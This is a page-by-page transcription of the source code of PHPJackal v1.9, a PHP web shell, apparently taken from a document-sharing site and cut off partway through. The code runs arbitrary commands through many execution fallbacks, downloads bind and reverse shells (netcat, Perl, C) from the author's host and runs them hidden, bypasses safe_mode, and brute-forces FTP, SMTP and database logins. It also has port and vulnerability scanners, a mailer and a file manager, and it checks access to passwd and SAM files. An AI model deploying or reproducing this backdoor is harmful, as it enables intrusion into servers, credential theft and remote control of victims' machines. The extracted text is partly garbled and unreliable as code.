Upload
aditya19890
View
125
Download
1
Embed Size (px)
Citation preview
5/13/2018 Php Jackal
1/39
5/13/2018 Php Jackal
2/39
elseif(function_exists('socket_set_timeout')){$scan=fsockopen("udp://$ip",$port);if($scan){socket_set_timeout($scan,$timeout);fwrite($scan,"\x00");$s=time();fread($scan,1);
if((time()-$s)>=$timeout){fclose($scan);return 1;}}}return 0;}if(!function_exists('is_executable')){function is_executable($addr){return 0;}}if(!function_exists('file_get_contents')){function file_get_contents($addr){
$a=fopen($addr,'r');$tmp=fread($a,filesize($a));fclose($a);if($a)return $tmp;else return null;}}if(!function_exists('file_put_contents')){function file_put_contents($addr,$con){$a=fopen($addr,'w');if(!$a)return 0;$t=fwrite($a,$con);fclose($a);if($t)return strlen($con);
return 0;}}function file_add_contentS($addr,$con){$a=fopen($addr,'a');if(!$a)return 0;fwrite($a,$con);fclose($a);return strlen($con);}if(!empty($_REQUEST['chmoD']) && !empty($_REQUEST['modE']))chmod($_REQUEST['chmoD'],'0'.$_REQUEST['modE']);
if(!empty($_REQUEST['downloaD'])){ob_clean();$dl=$_REQUEST['downloaD'];$con=file_get_contents($dl);header('Content-type: application/octet-stream');header("Content-disposition: attachment; filename=\"$dl\";");header('Content-length: '.strlen($con));echo $con;exit;}if(!empty($_REQUEST['imagE'])){$img=$_REQUEST['imagE'];header('Content-type: imagE/gif');
header("Content-length: ".filesize($img));header("Last-Modified: ".date('r',filemtime($img)));echo file_get_contents($img);
5/13/2018 Php Jackal
3/39
exit;}if(!empty($_REQUEST['exT'])){$ex=$_REQUEST['exT'];$e=get_extension_funcs($ex);echo
''.htmlspecialchars($ex).'Functions:
';foreach($e as $k=>$f){$i=$k+1;echo "$i)$f
";if(in_array($f,$disabl
efunctions))echo 'DISABLED';echo '
';}echo '';exit;}function
showsizE($size){if($size>=1073741824)$size=round(($size/1073741824),2).'
GB';elseif($size>=1048576)$size=round(($size/1048576),2).'
MB';elseif($size>=1024)$size=round(($size/1024),2).' KB';else
$size.=' B';return
$size;}$windows=(substr((strtoupper(php_uname())),0,3)=='WIN')?1:0;
$errorbox="Error: ";$v='1.9';$cwd=getcwd();$msgbox="
";$intro="Script:
".str_repeat('-=-',25)."
Name: PHPJackal
Version: $v
Author:
".str_repeat('-=-',25)."
Name: NetJackal
Country: Iran
Website: http://netjackal.by.ru/
Email: [email protected]
".str_repeat('-=-',25)."
Error: Enable JavaScript in your browser!!
!$et";$footer="${msgbox}PHPJackal v$v - Powered By NetJackal$et";$hcwd="";$t="";$crack="Dictionary:Dictionary type:Simple (P)Combo (U:P)Username:Server:Log $hcwd $et";function checkfunctioN($func){global $disablefunctions,$safemode;$safe=array('passthru','system','exec','shell_exec','popen','proc_open');
if($safemode=='ON' && in_array($func,$safe))return 0;elseif(function_exists($func) && is_callable($func) && !in_array($func,$disablefunctions))return 1;
5/13/2018 Php Jackal
4/39
return 0;}function whereistmP(){$uploadtmp=ini_get('upload_tmp_dir');$uf=getenv('USERPROFILE');$af=getenv('ALLUSERSPROFILE');$se=ini_get('session.save_path');
$envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';if(is_dir($uf) && is_writable($uf))return $uf;if(is_dir($af) && is_writable($af))return $af;if(is_dir($se) && is_writable($se))return $se;if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;return '.';}function shelL($command){
global $windows;$exec=$output='';$dep[]=array('pipe','r');$dep[]=array('pipe','w');if(checkfunctioN('passthru')){ob_start();passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();}elseif(checkfunctioN('system')){$tmp=ob_get_contents();ob_clean();system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;}elseif(checkfunctioN('exec')){exec($command,$output);$output=join("\n",$output);$exec=$output;}elseif(checkfunctioN('shell_exec'))$exec=shell_exec($command);elseif(checkfunctioN('popen')){$output=popen($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);}elseif(checkfunctioN('proc_open')){$res=proc_open($command,$dep,$pipes);while(!f
eof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($res);}elseif(checkfunctioN('win_shell_execute'))$exec=winshelL($command);elseif(checkfunctioN('win32_create_service'))$exec=srvshelL($command);elseif(extension_loaded('ffi') && $windows)$exec=ffishelL($command);elseif(is_object($ws=new COM('WScript.Shell')))$exec=comshelL($command,$ws);elseif(extension_loaded('perl'))$exec=perlshelL($command);return $exec;}function getiT($get){$fo=strtolower(ini_get('allow_url_fopen'));$ui=strtolower(ini_get('allow_url_include'));
if($fo $fo=='on')$con=file_get_contents($get);elseif($ui $ui=='on'){ob_start();include($get);$con=ob_get_contents();ob_end_clean();}else{$u=parse_url($get);$host=$u['host'];$file=(empty($u['path']))?'/':$u['path'];$port=(empty($u['port']))?80:$u['port'];$url=fsockopen($host,$port,$en,$es,12);fputs($url,"GET $file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nRefere
r: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n");$tmp=$con='';
5/13/2018 Php Jackal
5/39
while($tmp!="\r\n")$tmp=fgets($url);while(!feof($url))$con.=fgets($url);}return $con;}function downloadiT($get,$put){$con=getiT($get);
$mk=file_put_contents($put,$con);if($mk)return 1;return 0;}function winshelL($command){$name=whereistmP()."\\".uniqid('NJ');win_shell_execute('cmd.exe','',"/C $command >\"$name\"");sleep(1);$exec=file_get_contents($name);unlink($name);return $exec;}
function ffishelL($command){$name=whereistmP()."\\".uniqid('NJ');$api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");$res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);while(!file_exists($name))sleep(1);$exec=file_get_contents($name);unlink($name);return $exec;}function srvshelL($command){$name=whereistmP()."\\".uniqid('NJ');$n=uniqid('NJ');$cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['Com
Spec'];win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));win32_start_service($n);win32_stop_service($n);win32_delete_service($n);while(!file_exists($name))sleep(1);$exec=file_get_contents($name);unlink($name);return $exec;}function comshelL($command,$ws){
$exec=$ws->exec("cmd.exe /c $command");$so=$exec->StdOut();return $so->ReadAll();}function perlshelL($command){$perl=new perl();ob_start();$perl->eval("system('$command')");$exec=ob_get_contents();ob_end_clean();return $exec;}function smtpchecK($addr,$user,$pass,$timeout){
$sock=fsockopen($addr,25,$n,$s,$timeout);if(!$sock)return -1;fread($sock,1024);
5/13/2018 Php Jackal
6/39
fputs($sock,'ehlo '.uniqid('NJ')."\r\n");$res=substr(fgets($sock,512),0,1);if($res!='2')return 0;fgets($sock,512);fgets($sock,512);fgets($sock,512);fputs($sock,"AUTH LOGIN\r\n");$res=substr(fgets($sock,512),0,3);if($res!='334')return 0;
fputs($sock,base64_encode($user)."\r\n");$res=substr(fgets($sock,512),0,3);if($res!='334')return 0;fputs($sock,base64_encode($pass)."\r\n");$res=substr(fgets($sock,512),0,3);if($res!='235')return 0;return 1;}function mysqlchecK($host,$user,$pass,$timeout){if(function_exists('mysql_connect')){$l=mysql_connect($host,$user,$pass);if($l)return 1;
}return 0;}function mssqlchecK($host,$user,$pass,$timeout){if(function_exists('mssql_connect')){$l=mssql_connect($host,$user,$pass);if($l)return 1;}return 0;}function checksmtP($host,$timeout){$from=strtolower(uniqid('nj')).'@'.strtolower(uniqid('nj')).'.com';$sock=fsockopen($host,25,$n,$s,$timeout);
if(!$sock)return -1;$res=substr(fgets($sock,512),0,3);if($res!='220')return 0;fputs($sock,'HELO '.uniqid('NJ')."\r\n");$res=substr(fgets($sock,512),0,3);if($res!='250')return 0;fputs($sock,"MAIL FROM: \r\n");$res=substr(fgets($sock,512),0,3);if($res!='250')return 0;fputs($sock,"RCPT TO: \r\n");$res=substr(fgets($sock,512),0,3);if($res!='250')return 0;
fputs($sock,"DATA\r\n");$res=substr(fgets($sock,512),0,3);if($res!='354')return 0;fputs($sock,"From: ".uniqid('NJ')." ".uniqid('NJ')." \r\nSubject: ".uniqid('NJ')."\r\nMIME-Version: 1.0\r\nContent-Type: text/plain;\r\n\r\n".uniqid('Hello ',true)."\r\n.\r\n");$res=substr(fgets($sock,512),0,3);if($res!='250')return 0;return 1;}function replace_stR($s,$h){$ret=$h;foreach($s as $k=>$r)$ret=str_replace($k,$r,$ret);
return $ret;}function check_urL($url,$method,$search='200',$timeout=3){
5/13/2018 Php Jackal
7/39
$u=parse_url($url);$method=strtoupper($method);$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';$port=(empty($u['port']))?80:$u['port'];$data=(!empty($u['query']))?$u['query']:'';if(!empty($data))$data="?$data";$sock=fsockopen($host,$port,$en,$es,$timeout);
if($sock){fputs($sock,"$method $file$data HTTP/1.0\r\n");fputs($sock,"Host: $host\r\n");if($method=='GET')fputs($sock,"\r\n");elseif($method=='POST')fputs($sock,'Content-Type: application/x-www-form-urlencoded\r\nContent-length: '.strlen($data)."\r\nAccept-Encoding: text\r\nConnection:close\r\n\r\n$data");else return 0;if($search=='200')if(strstr(fgets($sock),'200')){fclose($sock);return 1;}else{fclose($sock);return 0;}while(!feof($sock)){$res=fgets($sock);
if(!empty($res))if(strstr($res,$search)){fclose($sock);return 1;}}fclose($sock);}return 0;}function get_sw_namE($host,$timeout){$sock=fsockopen($host,80,$en,$es,$timeout);if($sock){$page=uniqid('NJ');fputs($sock,"GET /$page HTTP/1.0\r\n\r\n");while(!feof($sock)){$con=fgets($sock);
if(strstr($con,'Server:')){$ser=substr($con,strpos($con,' ')+1);return $ser;}}fclose($sock);return -1;}return 0;}function snmpchecK($ip,$com,$timeout){$res=0;$n=chr(0x00);$packet=chr(0x30).chr(0x26).chr(0x02).chr(0x01).chr(0x00).chr(0x04).chr(strlen($com)).$com.chr(0xA0).chr(0x19).chr(0x02).chr(0x01).chr(0x01).chr(0x02).chr(0x01).$n.chr(0x02).chr(0x01).$n.chr(0x30).chr(0x0E).chr(0x30).chr(0x0C).chr(0x06).chr
(0x08).chr(0x2B).chr(0x06).chr(0x01).chr(0x02).chr(0x01).chr(0x01).chr(0x01).$n.chr(0x05).$n;$sock=fsockopen("udp://$ip",161);if(function_exists('socket_set_timeout'))socket_set_timeout($sock,$timeout);fputs($sock,$packet);socket_set_timeout($sock,$timeout);$res=fgets($sock);fclose($sock);if($res != '')return 1;else return 0;}$safemode=(ini_get('safe_mode') strtolower(ini_get('safe_mode'))=='on')?'ON':'OFF';if($safemode=='ON'){ini_restore('safe_mode');ini_restore('open_basedir');}
function brshelL(){global $errorbox,$windows,$et,$hcwd;$_REQUEST['C']=(isset($_REQUEST['C']))?$_REQUEST['C']:0;
5/13/2018 Php Jackal
8/39
$addr='http://netjackal.by.ru/br';$error="$errorbox Can not make backdoor file, go to writeable folder.$et";$n=uniqid('NJ_');if(!$windows)$n=".$n";$d=whereistmP();$name=$d.DIRECTORY_SEPARATOR.$n;$c=($_REQUEST['C'])?1:0;
if(!empty($_REQUEST['port']) && ($_REQUEST['port']=1)){$port=(int)$_REQUEST['port'];if($windows){if($c){$name.='.exe';$bd=downloadiT("$addr/nc",$name);shelL("attrib +H $name");if(!$bd)echo $error;else shelL("$name -L -p $port -e cmd.exe");}else{$name=$name.'.pl';$bd=downloadiT("$addr/winbind.p",$name);
shelL("attrib +H $name");if(!$bd)echo $error;else shelL("perl
$name
$port");}}else{if($c){$bd=downloadiT("$addr/bind.c",$name);if(!$bd)echo
$error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $port
&");}else{$bd=downloadiT("$addr/bind.p",$name);if(!$bd)echo
$error;else shelL("cd $d;perl $n $port &");echo "Backdoor is
waiting for you on $port.
";
}}}elseif(!empty($_REQUEST['rport']) && ($_REQUEST['rport']=1) && !empty($_REQUEST['ip'])){$ip=$_REQUEST['ip'];$port=(int)$_REQUEST['rport'];if($windows){if($c){$name.='.exe';$bd=downloadiT("$addr/nc",$name);shelL("attrib +H $name");
if(!$bd)echo $error;else shelL("$name $ip $port -e cmd.exe");}else{$name=$name.'.pl';$bd=downloadiT("$addr/winrc.p",$name);shelL("attrib +H $name");if (!$bd)echo $error;else shelL("perl.exe $name $ip $port");}}else{if($c){$bd=downloadiT("$addr/rc.c",$name);if(!$bd)echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $ip $port &");
}else{$bd=downloadiT("$addr/rc.p",$name);if(!$bd)echo $error;else shelL("cd $d;perl $n $ip $port &");
5/13/2018 Php Jackal
9/39
}}echo 'Done!';}else{echo "Bind shell:Port:
Type:PERL";if($windows)echo 'EXE';else echo
'C';echo"$hcwd$etReverse shell:IP:Port:Type:PERL";if($windows)echo
'EXE';else echo 'C';echo"$hcwd$et$et";}}function
showimagE($img){echo "";}function editoR($file){global
$errorbox,$et,$hcwd,$cwd;if(is_file($file)){if(!is_readable($file)){echo
"$errorbox File is not readable$et
";}
if(!is_writeable($file)){echo "$errorbox File is not
writeable$et
";}$data=file_get_contents($file);echo "$hcwd$et
";echo htmlspecialchars($data);echo "";
}else {echo "$hcwd$et
";}echo "$hcwd$et";}
function webshelL(){global $windows,$hcwd,$et,$cwd;if($windows){
5/13/2018 Php Jackal
10/39
$alias="Display open portsList of processesSystem informationIP configurationGet MAC addressServices listMachines in domainUserslistTurn off the server";}
else{$alias="Display open portsShow last 250 logged in
usersDownloadersFind world-writable directoriesFind world-writable
directories(in current directory)Find world-writable filesFind
world-writable files(in current directory)Find files with SUID bit
setFind files with SGID bit setFind .htpasswd filesFind
.bash_history filesView syslog.confView hostsList of
processes";if(is_dir('/etc/valiases'))$alias.="List ofcPanel`s
domains(valiases)";if(is_dir('/etc/vdomainaliases'))$alias.="List
cPanel`s
domains(vdomainaliases)";if(file_exists('/var/cpanel/accounting.log'))$alias.="Display
cPanel`s log";if(is_dir('/var/spool/mail/'))$alias.="Mailboxes
list";}echo "Location:$et
Web Shell:";if(!empty($_REQUEST['cmd']))echo
shelL($_REQUEST['cmd']);echo"$hcwd$alias$hcwd$et";
}function maileR(){global
$msgbox,$et,$hcwd;if(!empty($_REQUEST['subject'])&&!empty($_REQUEST['body'])&&!empty($_REQUEST['from'])&&!empty($_REQUEST['to'])){$to=$_REQUEST['to'];$from=$_REQUEST['from'];$subject=$_REQUEST['subject'];$body=$_REQUEST['body'];if(mail($to,$subject,$body,"From:
$from"))echo "$msgboxMail sent!
$et";}echo "
Mailer:SMTP".ini_get('SMTP').'
('.ini_get('smtp_port').")From:$hcwdTo:
5/13/2018 Php Jackal
11/39
r='#666666'>Subject:Body:$et";
}function scanneR(){global $hcwd,$et;if(!empty($_SERVER['SERVER_ADDR']))$host=$_SERVER['SERVER_ADDR'];else $host='127.0.0.1';$udp=(empty($_REQUEST['udp']))?0:1;$tcp=(empty($_REQUEST['tcp']))?0:1;if(($udp$tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport'])&& !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])){$target=$_REQUEST['target'];$from=(int)$_REQUEST['fromport'];$to=(int)$_REQUEST['toport'];$timeout=(int)$_REQUEST['timeout'];$nu=0;echo 'Port scanning started against '.htmlspecialchars($target)
.':
';$start=time();for($i=$from;$i
5/13/2018 Php Jackal
12/39
if(strstr($port,','))$p=explode(',',$port);else $p[0]=$port;$open=$ser='';foreach($p as $po){$scan=checkthisporT($ip,$po,$timeout);if($scan){$ser='';if($ser=getservbyport($po,'tcp'))$ser="($ser)";
$open.=" $po$ser ";}}if($open){echo "$ip) Open ports:$open
";$output=1;}
}if(!empty($_REQUEST['httpbanner'])){$res=get_sw_namE($ip,$timeout);if($res){echo "$ip) Webserver software: ";if($res==-1)echo 'Unknow';else echo $res;
echo '
';$output=1;}}if(!empty($_REQUEST['httpscanner'])){if(checkthisporT($ip,80,$timeout)
&&
!empty($file)){$admin=array('/admin/','/adm/');$users=array('adm','bin','daemon','ftp','guest','listen','lp','mysql','noaccess','nobody','nobody4','nuucp','operator','root','smmsp','smtp','sshd','sys','test','unknown','uucp','web','www');$nuke=array('/','/postnuke/','/postnuke/html/','/modules/','/phpBB/','/forum/');$cgi=array('/cgi.cgi/','/webcgi/','/cgi-914/','/cgi-915/','/bin/','/cgi/','/mpcgi/','/cgi-bin/','/ows-bin/','/cgi-sys/','/cgi-local/','/htbin/','/cgibin/','/cgi
s/','/scripts/','/cgi-win/','/fcgi-bin/','/cgi-exe/','/cgi-home/','/cgi-perl/');foreach($file as $v){$vuln=array();$v=trim($v);if(!$v $v{0}=='#')continue;$v=str_replace('","','^',$v);$v=str_replace('"','',$v);$vuln=explode('^',$v);$page=$cqich=$nukech=$adminch=$userch=$vuln[1];if(strstr($page,'@CGIDIRS'))foreach($cgi as $cg){$cqich=str_replace('@CGIDIRS',$cg,$page);
$url="http://$ip$cqich";$res=check_urL($url,$vuln[3],$vuln[2],$timeout);if($res){$output=1;echo
"$ip)".$vuln[4]." $url
";}}elseif(strstr($page,'@ADMINDIRS'))foreach($admin as
$cg){$adminch=str_replace('@ADMINDIRS',$cg,$page);$url="http://$ip$adminch";$res=check_urL($url,$vuln[3],$vuln[2],$timeout);if($res){$output=1;echo
"$ip)".$vuln[4]." $url
";}}
elseif(strstr($page,'@USERS'))foreach($users as $cg){$userch=str_replace('@USERS',$cg,$page);
5/13/2018 Php Jackal
13/39
$url="http://$ip$userch";$res=check_urL($url,$vuln[3],$vuln[2],$timeout);if($res){$output=1;echo
"$ip)".$vuln[4]." $url
";}}elseif(strstr($page,'@NUKE'))foreach($nuke as $cg){
$nukech=str_replace('@NUKE',$cg,$page);$url="http://$ip$nukech";$res=check_urL($url,$vuln[3],$vuln[2],$timeout);if($res){$output=1;echo
"$ip)".$vuln[4]." $url
";}}else{$url="http://$ip$page";$res=check_urL($url,$vuln[3],$vuln[2],$timeout);if($res){$output=1;echo
"$ip)".$vuln[4]." $url
";}}
}}}if(!empty($_REQUEST['smtprelay'])){if(checkthisporT($ip,25,$timeout)){$res='';$res=checksmtP($ip,$timeout);if($res==1){echo
"$ip) SMTP relay found.
";$output=1;}}}if(!empty($_REQUEST['snmpscanner'])){if(checkthisporT($ip,161,$timeout,1)){$com=$_REQUEST['com'];
$coms=$res='';if(strstr($com,','))$c=explode(',',$com);else
$c[0]=$com;foreach($c as
$v){$ret=snmpchecK($ip,$v,$timeout);if($ret)$coms.=" $v
";}if($coms!=''){echo "$ip) SNMP FOUND: $coms
";$output=1;}}}if(!empty($_REQUEST['ftpscanner']) &&
function_exists('ftp_connect')){if(checkthisporT($ip,21,$timeout)){$usps=explode(',',$_REQUEST['userpass']);
foreach($usps as
$v){$user=substr($v,0,strpos($v,':'));$pass=substr($v,strpos($v,':')+1);if($pass=='[BLANK]')$pass='';$ftp=ftp_connect($ip,21,$timeout);if($ftp){if(ftp_login($ftp,$user,$pass)){$output=1;echo
"$ip) FTP FOUND: ($user:$pass) System type: ".ftp_systype($ftp)."
(Connect)
";}}}}
}if($output)echo '';}
5/13/2018 Php Jackal
14/39
$time=time()-$start;echo "Done! ($time seconds)";if(!empty($buglist))unlink($buglist);}elseif(!empty($_REQUEST['directoryscanner'])){$dir=file($_REQUEST['dic']);$host=$_REQUEST['host'];$r=$_REQUEST['r1'];echo "Scanning started...\n";
for($i=0;$i
5/13/2018 Php Jackal
15/39
bgcolor='#808080'>Get web bannerWebserver security scanningSMTP relay checkFTP password:SNMP:$et";}}function sysinfO(){global $windows,$disablefunctions,$cwd,$safemode;$t8="";$t6="";$mil="
5/13/2018 Php Jackal
16/39
$os=php_uname();$osn=php_uname('s');if(!$windows){$ker=php_uname('r');$o=($osn=='Linux')?'Linux+Kernel':$osn;$os=str_replace($osn,"${mil}$o'>$osn",$os);$os=str_replace($ker,"${mil}Linux+Kernel'>$ker",$os);
$inpa=':';}else{$sam=$sysroot."\\system32\\config\\SAM";$inpa=';';$os=str_replace($osn,"${mil}MS+Windows'>$osn",$os);}$cuser=get_current_user();if(!$cuser)$cuser='Unknow';$software=str_replace('Apache',"${mil}Apache'>Apache",$_SERVER['SERVER_SOFTWARE']);echo "Server information:${t6
}Server:".$_SERVER['HTTP_HOST'];if(!empty($_SERVER["SERVER_ADDR"])){ echo "(". $_SERVER["SERVER_ADDR"] .")";}echo "${t8}Operation system:$os$osver${t6}Web server application:$software${t8}CPU:$CPU${t6}Disk status:$disksize${t8}User domain:";if (!empty($_SERVER['USERDOMAIN'])) echo $_SERVER['USERDOMAIN'];else echo "Unknow"; echo "${t6}User name:$cuser";if($windows){echo "${t8}Windows directory:$sysroot${t6}Sam file:";if(is_readable(($sam)))echo "Readable"; else echo 'Not readabl
e';echo '';}else{echo "${t8}UID - GID:".getmyuid().' - '.getmygid()."${t6}Recommended local root exploits:$xpl${t8}Passwd file:";if(is_readable('/etc/passwd'))echo "Readable";else echo'Not readable';echo "${t6}${mil}cpanel'>cPanel:";$cp='/usr/local/cpanel/version';$cv=(file_exists($cp) && is_writable($cp))?trim(file_get_contents($cp)):'Unknow';echo "$cv (Log file: ";
if(file_exists('/var/cpanel/accounting.log')){if(is_readable('/var/cpanel/accounting.log'))echo "Readable";else echo 'Not readable';}else echo 'Not found';echo ')';}echo "$t8${mil}PHP'>PHP version:".PHP_VERSION." (more...)${t6}Zend version:";if (function_exists('zend_version')) echo "".zend_version().'';else echo 'Not Found';echo "${t8}Include path:".str_replace($inpa,'',DEFAULT_INCLUDE_PATH)."${t6}PHP Modules:";$ext=get_loaded_extensions();foreach($ext as $v){$i=phpversion($v);if(!empty($i)
)$i="($i)";$l=hlinK("exT=$v");echo "$v $i ";}echo "${t8}Disabled functions:";if(!empty($ds))echo "$d
5/13/2018 Php Jackal
17/39
s ";else echo 'Nothing'; echo"${t6}Safe mode:$safemode${t8}Open base dir:$basedir${t6}DBMS:";$sq='';if(function_exists('mysql_connect')) $sq= "${mil}MySQL'>MySQL ";if(function_exists('mssql_connect')) $sq.= " ${mil}MSSQL'>MSSQL ";if(function_exists('ora_logon')) $sq.=" ${mil}Oracle'>Oracle ";if(function_exists('sqlite_open')) $sq.= ' SQLite ';if(function_exists('pg_connect')) $sq.= " ${mil}PostgreSQL'>PostgreSQL ";if
(function_exists('msql_connect')) $sq.= ' mSQL
';if(function_exists('mysqli_connect'))$sq.= ' MySQLi
';if(function_exists('ovrimos_connect')) $sq.= ' Ovrimos SQL ';if
($sq=='') $sq= 'Nothing'; echo "$sq";}function
checksuM($file){global $et;echo "MD5: ".md5_file($file).'
SHA1:'.sha1_file($file)."$et";}function
listdiR($cwd,$task){$c=getcwd();
$dh=opendir($cwd);while($cont=readdir($dh)){if($cont=='.' $cont=='..')continue;$adr=$cwd.DIRECTORY_SEPARATOR.$cont;switch($task){case '0':if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";break;case '1':if(is_writeable($adr)){if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";}break;case '2':if(is_file($adr) && is_writeable($adr))echo "[$adr]\n";break;
case '3':if(is_dir($adr) && is_writeable($adr))echo "[$adr]\n";break;case '4':if(is_file($adr))echo "[$adr]\n";break;case '5':if(is_dir($adr))echo "[$adr]\n";break;case '6':if(preg_match('@'.$_REQUEST['search'].'@',$cont) (is_file($adr) && preg_match('@'.$_REQUEST['search'].'@',file_get_contents($adr)))){if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";}break;case '7':if(strstr($cont,$_REQUEST['search']) (is_file($adr) && strstr(file_g
et_contents($adr),$_REQUEST['search']))){if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";}break;case '8':{if(is_dir($adr))rmdir($adr);else unlink($adr);rmdir($cwd);break;}}if(is_dir($adr))listdiR($adr,$task);}}if(!checkfunctioN('posix_getpwuid')){function posix_getpwuid($u){return 0;}}if(!checkfunctioN('posix_getgrgid')){function posix_getgrgid($g){return 0;}}function filemanageR(){global $windows,$msgbox,$errorbox,$t,$et,$cwd,$hcwd;$table="";$td1n="";$td2m="";
5/13/2018 Php Jackal
18/39
$td1i="";$td2i="";$tdnr="";$tdw="";if(!empty($_REQUEST['task'])){if(!empty($_REQUEST['search']))$_REQUEST['task']=7;if(!empty($_REQUEST['re']))$_REQUEST['task']=6;
echo '';listdiR($cwd,$_REQUEST['task']);echo '';}else{if(!empty($_REQUEST['cP']) !empty($_REQUEST['mV']) !empty($_REQUEST['rN'])){if(!empty($_REQUEST['cP']) !empty($_REQUEST['mV'])){$title='Destination';$ad=(!empty($_REQUEST['cP']))?$_REQUEST['cP']:$_REQUEST['mV'];$dis=(!empty($_REQUEST['cP']))?'Copy':'Move';}else{$ad=$_REQUEST['rN'];
$title='New name';$dis='Rename';}if(!!empty($_REQUEST['deS'])){echo "$title:$td1n$td2m$hcwd$et";}else{if(!empty($_REQUEST['rN']))rename($ad,$_REQUEST['deS']);else{copy($ad,$_REQUEST['deS']);
if(!empty($_REQUEST['mV']))unlink($ad);}}}if(!empty($_REQUEST['deL'])){if(is_dir($_REQUEST['deL']))listdiR($_REQUEST['deL'],8);else
unlink($_REQUEST['deL']);}if(!empty($_FILES['uploadfile'])){move_uploaded_file($_FILES['uploadfile']['tmp_name'],$_FILES['uploadfile']['name']);echo
"$msgboxUploaded! File name: ".$_FILES['uploadfile']['name']."
Filesize: ".$_FILES['uploadfile']['size']. "$et
";}
$select="--------
5/13/2018 Php Jackal
19/39
decoration:none' href='#' onClick=\"HS('div');\">- ] Location:$et";$file=$dir=$link=array();if($dirhandle=opendir($cwd)){while($cont=readdir($dirhandle)){if(is_dir($cwd.DIRECTORY_SEPARATOR.$cont))$dir[]=$cont;
elseif(is_file($cwd.DIRECTORY_SEPARATOR.$cont))$file[]=$cont;else $link[]=$cont;}closedir($dirhandle);sort($file);sort($dir);sort($link);echo "NameOwnerModification timeLast changeInfoSizeActions";$i=0;foreach($dir as $dn){echo '';$i++;$own='Unknow';$owner=posix_getpwuid(fileowner($dn));$mdate=date('Y/m/d H:i:s',filemtime($dn));$adate=date('Y/m/d H:i:s',fileatime($dn));$diraction=$select.hlinK('seC=fm&workingdiR='.realpath($dn))."'>OpenRenameRemove";
if($owner)$own="".$owner['name'].'';if(($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}if(is_writeable($dn))echo $tdw;elseif(!is_readable($dn))echo $tdnr;else echo $cl2;echo "";if(strlen($dn)>45)echo substr($dn,0,42).'...';else echo $dn;echo '';echo $cl1."$own";echo $cl1."$mdate";echo $cl1."$adate";echo "$cl1";echo "";echo 'D';if(is_readable($dn))echo 'R';if(is_writeable($dn))echo 'W'
;echo '';echo "$cl1------";echo $cl2.$diraction;echo '';}foreach($file as $fn){echo '';$i++;$own='Unknow';$owner=posix_getpwuid(fileowner($fn));$fileaction=$select.hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."'>OpenEditDownloadHex viewImageInclude
5/13/2018 Php Jackal
20/39
value='".hlinK("seC=checksum&filE=$fn&workingdiR=$cwd")."'>ChecksumCopyMoveRemove";$mdate=date('Y/m/d H:i:s',filemtime($fn));$adate=date('Y/m/d H:i:s',fileatime($fn));if($owner)$own="".$owner['name'].'';$size=showsizE(filesize($fn));if(($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}if(is_writeable($fn))echo $tdw;elseif(!is_readable($fn))echo $tdnr;else echo $cl2;echo "";if(strlen($fn)>45)echo substr($fn,0,42).'...';else echo $fn;echo '';echo $cl1."$own";echo $cl1."$mdate";echo $cl1."$adate";echo "$cl1";echo "";if(is_readable($fn))echo "R";if(is_writeable($fn))echo "W";if(is_ex
ecutable($fn))echo "X";if(is_uploaded_file($fn))echo "U";echo "";echo "$cl1$size";echo $cl2.$fileaction;echo '';}foreach($link as $ln){$own='Unknow';$i++;$owner=posix_getpwuid(fileowner($ln));$linkaction=$select.hlinK("seC=openit&namE=$ln&workingdiR=$ln")."'>OpenEditDownloadHex viewImageIncludeChecksumCopyMoveRenameRemove";$mdate=date('Y/m/d H:i:s',filemtime($ln));$adate=date('Y/m/d H:i:s',fileatime($ln));if($owner)$own="".$owner['name'].'';echo '';
$size=showsizE(filesize($ln));if(($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}if(is_writeable($ln))echo $tdw;elseif(!is_readable($ln))echo $tdnr;else echo $cl2;echo "";if(strlen($ln)>45)echo substr($ln,0,42).'...';else echo $ln;echo '';echo $cl1."$own";echo $cl1."$mdate";echo $cl1."$adate";echo "${cl1}";echo "L";if(is_readable($ln))echo "R";if (is_writeable($ln))echo "W";if(is_executable($ln))echo "X";echo "";echo "$cl1$size";
echo $cl2.$linkaction;echo '';}
5/13/2018 Php Jackal
21/39
}$dc=count($dir)-2;if($dc==-2)$dc=0;$fc=count($file);$lc=count($link);$total=$dc+$fc+$lc;$min=min(substr(ini_get('upload_max_filesize'),0,strpos(ini_get('post_max_size')
,'M')),substr(ini_get('post_max_size'),0,strpos(ini_get('post_max_size'),'M'))).'
MB';echo "$tableFind:Regular expressions $hcwd$hcwdDisplay files
and directories in current folderFind writable files and
directories in current folderFindwritable files in current
folderFind writable directories in current folderDisplay all files
in current folderDisplay all directories in current folder$et
Summery: Total: $total Directories: $dc Files: $fc Links:
